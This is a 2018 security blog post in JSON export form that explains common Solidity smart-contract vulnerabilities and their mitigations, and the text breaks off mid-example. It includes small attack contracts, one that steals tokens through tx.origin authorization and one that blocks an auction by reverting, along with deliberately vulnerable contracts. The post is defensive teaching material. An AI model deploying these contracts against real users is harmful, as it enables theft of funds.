{"id":2791,"date":"2018-05-25T07:49:34","date_gmt":"2018-05-25T07:49:34","guid":{"rendered":"http:\/\/nethemba.com\/summary-of-the-common-smart-contracts-vulnerabilities\/"},"modified":"2018-05-28T05:58:57","modified_gmt":"2018-05-28T05:58:57","slug":"summary-of-the-common-smart-contracts-vulnerabilities","status":"publish","type":"post","link":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","title":{"rendered":"Summary of the common smart contracts vulnerabilities"},"content":{"rendered":"<h1><span style=\"font-weight: 400;\">Introduction<\/span><\/h1>\n<p><span style=\"font-weight: 400;\">Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. With billions of dollars at play and relatively low-level of smart contract security enlightenment, smart contracts written in Solidity have been successfully exploited by a malicious user, and hundreds of millions worth of crypto funds have been stolen.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The goal of this article is to highlight frequent security vulnerabilities of contracts written in Solidity language and explain ways how to identify and mitigate them.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h1><span style=\"font-weight: 400;\">Dangerous assumptions<\/span><\/h1>\n<p><span style=\"font-weight: 400;\">Here is a list of assumptions one smart contract developer should <\/span><b>NOT <\/b><span style=\"font-weight: 400;\">make to stay out of trouble.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cNo one can send funds to my contract unless I allow them to\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">In Solidity, for a contract to be able to receive funds, at least one function has to be marked as \u2018payable\u2019. However, there are two special ways how someone can \u201cforce send\u201d funds to your contract even if none of the functions in your contract is marked as \u2018payable\u2019:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"color: #ff0000;\"><b>selfdestruct<\/b><\/span><span style=\"font-weight: 400;\"> function (see <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/latest\/units-and-global-variables.html#contract-related\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">Solidity docs<\/span><\/a><span style=\"font-weight: 400;\">)<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Anyone can call <\/span><span style=\"color: #ff0000;\"><b>selfdestruct<\/b><\/span><span style=\"font-weight: 400;\">(&lt;your_contract_addreess&gt;) in their contract and send the balance of their contract to your contract <\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Mining reward<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Miner can set the address of your contract as mining reward address, and when this miner successfully mines a block, then your contract will be credited with mining reward.<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Never assume that balance of your contract is 0 because anybody can send funds to your contract even if you haven\u2019t explicitly allowed your contract to receive funds.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> This characteristic of Ethereum smart contracts cannot be avoided.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cNo one can read the value of my private variable\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Variable in Solidity is either <\/span><span style=\"font-weight: 400; color: #ff0000;\">public<\/span><span style=\"font-weight: 400;\"> or <\/span><span style=\"font-weight: 400; color: #ff0000;\">private<\/span><span style=\"font-weight: 400;\">. Value of public variable is accessible for any contract via getter function automatically created by the compiler. Making variable as private prevents other contracts from accessing and modifying it, but a private variable is stored on the blockchain, so it is <\/span><b>visible to everyone<\/b><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let\u2019s use following contract to demonstrate how to read a value of a private variable.<\/span><\/p>\n<table style=\"width: 530.129px;\">\n<tbody>\n<tr>\n<td style=\"width: 525.129px;\"><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract GuessingGame {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0address public winner;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0int private secretNumber;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0constructor(int _secretNumber) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0secretNumber = _secretNumber;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function guess(int _secretNumber) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(winner == address(0));<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(secretNumber == _secretNumber);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0winner = msg.sender;<\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0}<\/span><span style=\"font-weight: 400;\">}<\/span><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">If you know the address of contract\u2019s instance, then the value of <\/span><span style=\"font-weight: 400;\">secretNumber<\/span> <span style=\"font-weight: 400;\">can be easily read via <\/span><a href=\"https:\/\/github.com\/ethereum\/web3.js\"><span style=\"font-weight: 400;\">web3.js<\/span><\/a><span style=\"font-weight: 400;\"> library.<\/span><\/p>\n<table style=\"width: 443.078px;\">\n<tbody>\n<tr>\n<td style=\"width: 436.078px;\"><span style=\"font-weight: 400; color: #808080;\">\/\/ create callback to display returned value<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">var callback = function(error, result){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0if(!error)<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0window.alert(result);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0else<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0window.alert(error);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">};<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">\/\/ read value from contract\u2019s storage<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">web3.eth.getStorageAt(&#8218;&lt;contract address&gt;&#8216;, 1, callback); <\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">Web3.js <\/span><a href=\"https:\/\/github.com\/ethereum\/wiki\/wiki\/JavaScript-API#web3ethgetstorageat\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">getStorageAt<\/span><\/a> <span style=\"font-weight: 400;\">command reads the value from contract\u2019s storage and returns a hexadecimal representation of the variable\u2019s value. It is necessary to convert the returned value from hex to decimal representation to get the integer value of <\/span><span style=\"font-weight: 400;\">secretNumber<\/span><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Note that value of the second parameter of the <\/span><span style=\"font-weight: 400;\">getStorageAt<\/span><span style=\"font-weight: 400;\"> function is 1 because we are interested in the value of second state variable of GuessingGame contract instance. To retrieve the value of <\/span><span style=\"font-weight: 400;\">winner<\/span><span style=\"font-weight: 400;\">(first state variable) via <\/span><span style=\"font-weight: 400;\">getStorageAt<\/span><span style=\"font-weight: 400;\">, we would call it with 0 as a value of the second parameter. Here you can read more about <\/span><a href=\"https:\/\/medium.com\/aigang-network\/how-to-read-ethereum-contract-storage-44252c8af925\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">How to read Ethereum contract storage<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><b>Lesson learned: <\/b><span style=\"font-weight: 400;\">All information stored on blockchain is <\/span><b>publically visible<\/b><span style=\"font-weight: 400;\"> including all contract state variables.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> One way how to overcome described limitation\/feature of blockchain is to store hashed or encrypted <\/span><span style=\"font-weight: 400;\">secretNumber<\/span><span style=\"font-weight: 400;\"> instead of the plain integer. An example of how to \u201chide\u201d information on blockchain can be found <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/latest\/solidity-by-example.html#id2\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">here<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201ctx.origin is the same as msg.sender\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">There are two variables &#8211; <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> and <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> &#8211; in Solidity contract\u2019s global namespace which look very similar, but interchanging them might lead to a severe security vulnerability. <\/span><span style=\"font-weight: 400; color: #ff0000;\">Tx.origin<\/span><span style=\"font-weight: 400;\"> returns address which initiated the current transaction. On the other hand <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> returns address which originated current message call. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Following contracts demonstrate the difference between transaction and message call.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract A {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function functionA(address _otherContractAddress) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0B contractB = B(_otherContractAddress);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0contractB.functionB();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract B {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function functionB() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\/\/ do something<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">There are 3 different addresses relevant for our example:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">&lt;address1&gt; &#8211; address which executes functionA on instance of contract A<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">&lt;address2&gt; &#8211; address of contract A instance<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">&lt;address3&gt; &#8211; address of contract B instance<\/span><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><span style=\"font-weight: 400;\">When &lt;address1&gt; calls <\/span><span style=\"font-weight: 400;\">functionA <\/span><span style=\"font-weight: 400;\">on the instance of contract A with <\/span><span style=\"font-weight: 400;\">_otherContractAddress<\/span><span style=\"font-weight: 400;\"> parameter value equal to &lt;address3&gt;, then in <\/span><span style=\"font-weight: 400;\">functionA<\/span><span style=\"font-weight: 400;\"> the value of <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> and <\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">msg.sender<\/span> <\/span><span style=\"font-weight: 400;\">will be the same and equal to &lt;address1&gt;. Then when <\/span><span style=\"font-weight: 400;\">functionA<\/span><span style=\"font-weight: 400;\"> calls <\/span><span style=\"font-weight: 400;\">functionB<\/span><span style=\"font-weight: 400;\"> on the instance of contract B then <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> will be &lt;address1&gt; and <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> will be &lt;address2&gt;.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let\u2019s take a look at how authorization via <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> can be exploited on the simplified version of a standard token contract.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract Token {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0mapping(address =&gt; uint) balances;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function transfer(address _to, uint _value) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\/\/ checks to make sure that tx.origin has enough tokens<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\/\/ &#8230;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[tx.origin] -= _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[_to] += _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><span style=\"font-weight: 400;\">The following contract can be used to steal victim\u2019s tokens.<\/span><\/p>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">interface Token {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function transfer(address _to, uint _value) external;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract MaliciousContract {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0address attackerAddress;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0Token contractToAttack;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0constructor(address _contractToAttack) public {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0contractToAttack = Token(_contractToAttack);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0attackerAddress = msg.sender;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\/\/ fallback function<\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0function () public payable {<\/span><span style=\"font-weight: 400;\"><br \/>\ncontractToAttack.transfer(attackerAddress, 10000);<\/span><\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">If an attacker tricks the victim to send some funds to address of MaliciousContract instance, \u00a0then the fallback function of MaliciousContract will call transfer function of Token contract instance and will transfer victim\u2019s tokens to attacker\u2019s address. In transfer function <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> will be the victim&#8217;s address, because the victim initiated this transaction by sending funds to MaliciousContract instance, while <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> will be the malicious contract&#8217;s address. <\/span><\/p>\n<p><b>Lesson learned:<\/b> <span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> is not always the same as <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> Never use <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> for authorization.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cSending funds is always successful\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Solidity offers following functions to send funds:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400; color: #ff0000;\">transfer<\/span><span style=\"font-weight: 400;\"> &#8211; throws on failure, forwards 2300 gas stipend, not adjustable<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400; color: #ff0000;\">send<\/span><span style=\"font-weight: 400;\"> &#8211; returns false on failure, forwards 2300 gas stipend, not adjustable<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> &#8211; returns false on failure, forwards all available gas, adjustable<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">The difference between these listed functions is how they behave on failure and how much gas they forward.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let&#8217;s use the following contract to illustrate why it can be dangerous to assume that sending funds is always successful. The following contract is a simplified version of an auction contract.<\/span><\/p>\n<table style=\"width: 363.117px;\">\n<tbody>\n<tr>\n<td style=\"width: 357.117px;\"><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract Auction {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0uint public highestBid;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address public highestBidder; <\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function bid() public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0require(msg.value &gt; highestBid);<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (highestBid &gt; 0) {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ send money back to current highest bidder<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0require(highestBidder.send(highestBid));<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ store new highest bidder<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0highestBidder = msg.sender;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0highestBid = msg.value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">This contract would work correctly if only <\/span><a href=\"https:\/\/github.com\/ethereum\/wiki\/wiki\/Ethereum-Development-Tutorial#introduction\"><span style=\"font-weight: 400;\">EOAs<\/span><\/a><span style=\"font-weight: 400;\"> (Externally Owned Accounts) are bidding, but any malicious contracts can prevent other people from bidding by intentionally refusing incoming funds. There are a few ways that contracts can refuse funds:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">revert<\/span>()<\/span><span style=\"font-weight: 400;\"> or throw (via <\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">require<\/span>()<\/span><span style=\"font-weight: 400;\"> or <\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">assert<\/span>()<\/span><span style=\"font-weight: 400;\">) in fallback function<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">intentionally run out of gas in fallback function<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Omitting <\/span><span style=\"font-weight: 400; color: #ff0000;\">payable<\/span><span style=\"font-weight: 400;\"> keyword for fallback function \u00a0<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">If a malicious contract is currently the highest bidder, then no one else is able to place their bid, because <\/span><span style=\"font-weight: 400;\">assert(highestBidder.send(highestBid)) <\/span><span style=\"font-weight: 400;\">always throws and this way the malicious contract would ensure that it wins this auction.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Here is an example how a malicious contract may look:<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">interface Auction {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function bid() external payable ;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract MaliciousContract {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function bid(address auctionAddress) public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Auction auction = Auction(auctionAddress);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0auction.bid.value(msg.value)();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function () public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0revert();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><b>Real World Example:<\/b><span style=\"font-weight: 400;\"> \u00a0Few <\/span><a href=\"http:\/\/www.kingoftheether.com\/postmortem.html\"><span style=\"font-weight: 400;\">people didn\u2019t get compensated<\/span><\/a><span style=\"font-weight: 400;\"> because creators of <\/span><a href=\"https:\/\/www.kingoftheether.com\/thrones\/kingoftheether\/index.html\"><span style=\"font-weight: 400;\">King of the ether<\/span><\/a><span style=\"font-weight: 400;\"> pyramid scheme forgot to check the return value of <\/span><span style=\"font-weight: 400; color: #ff0000;\">send<\/span><span style=\"font-weight: 400;\"> call. <\/span><\/p>\n<p><b>Lesson learned:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Never assume that sending funds is always successful.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Always check the return value from low-level call functions (<\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">call, callcode, delegatecall<\/span> <\/span><span style=\"font-weight: 400;\">and<\/span><span style=\"font-weight: 400; color: #ff0000;\"> send<\/span><span style=\"font-weight: 400;\">)<\/span><\/li>\n<\/ul>\n<p><b>Tip:<\/b><span style=\"font-weight: 400;\"> Avoid invoking too much logic(e.g., multiple send calls) in one transaction, because your transaction might run out of gas. <\/span><a href=\"https:\/\/www.reddit.com\/r\/ethereum\/comments\/4ghzhv\/governmentals_1100_eth_jackpot_payout_is_stuck\/\"><span style=\"font-weight: 400;\">1100 ETH(~8k USD at that time) got stuck in limbo<\/span><\/a><span style=\"font-weight: 400;\"> because <\/span><a href=\"http:\/\/governmental.github.io\/GovernMental\/\"><span style=\"font-weight: 400;\">GovernMental<\/span><\/a><span style=\"font-weight: 400;\"> Ponzi scheme contract was programmed to iterate over growing array of integers in the jackpot payout procedure. Eventually, array became too long and transaction always ran out of gas.<\/span><\/p>\n<p><b>How to mitigate:<\/b><\/p>\n<ol>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Always handle the possibility that external call can fail by checking return value when low-level call method (<\/span><span style=\"font-weight: 400; color: #ff0000;\">call, callcode, delegatecall <\/span><span style=\"font-weight: 400;\">and<\/span><span style=\"font-weight: 400; color: #ff0000;\"> send<\/span><span style=\"font-weight: 400;\">) is used.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It is recommended to use <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/v0.4.21\/common-patterns.html?highlight=checks%20effects%20interaction#withdrawal-from-contracts\"><span style=\"font-weight: 400;\">Withdrawal pattern<\/span><\/a><span style=\"font-weight: 400;\"> (also known as <\/span><a href=\"https:\/\/consensys.github.io\/smart-contract-best-practices\/recommendations\/#favor-pull-over-push-for-external-calls\"><span style=\"font-weight: 400;\">favor pull over push for external calls<\/span><\/a><span style=\"font-weight: 400;\"> ) and only let the user withdraw funds after the fact instead of sending money right away. Some users might complain that withdrawing funds is an additional interaction with the contract which affects usability, but it is ultimately up to the contract creator to decide if the additional security is it is worth the sacrifice in usability. <\/span><a href=\"https:\/\/medium.com\/@makoto_inoue\/a-smartcontract-best-practice-push-pull-or-give-b2e8428e032a\"><span style=\"font-weight: 400;\">This<\/span><\/a><span style=\"font-weight: 400;\"> article offers an interesting analysis of user preferences when it comes to getting funds out from contracts.<\/span><\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cNumbers behave as expected\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">There are 2 types (with 4 subtypes) to store numbers in Solidity:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Integers &#8211; signed and unsigned integers of various sizes<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Fixed point numbers &#8211; signed and unsigned fixed-point number of various sizes<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Currently, fixed-point numbers are not fully supported; therefore we will discuss only integers. Unsigned integers are known for their overflow and underflow behavior which might surprise many developers.<\/span><\/p>\n<p><b>Overflow<\/b><span style=\"font-weight: 400;\"> happens when an unsigned integer(uint256) variable has a maximum integer value (2\u00b2\u2075\u2076-1), and it is increased by 1, then its value becomes 0. This behavior is similar to car odometer roll-over.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">uint256 max = 2**256-1; \/\/ max has maximum value which can be stored in unsigned integer<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">max += 1; \/\/ max has 0 value<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><b>Underflow<\/b><span style=\"font-weight: 400;\"> works in a similar but opposite way; it occurs when an unsigned integer(uint256) variable has the value of 0, and it is decreased by 1. It\u2019s value then becomes the maximum possible integer value(2\u00b2\u2075\u2076-1).<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">uint256 min = 0; \/\/ min has 0 value<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">min -= 1; \/\/ min has 2**256-1 value <\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">Following simplified token contract demonstrates how dangerous overflow and underflow can be.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"color: #808080;\"><span style=\"font-weight: 400;\">pragma solidity ^0.4.22;<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\">contract Token {<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> \u00a0mapping(address =&gt; uint) balances;<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> \u00a0function transfer(address _to, uint _value) public {<\/span><\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] &#8211; _value &gt;= 0);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[_to] += _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: 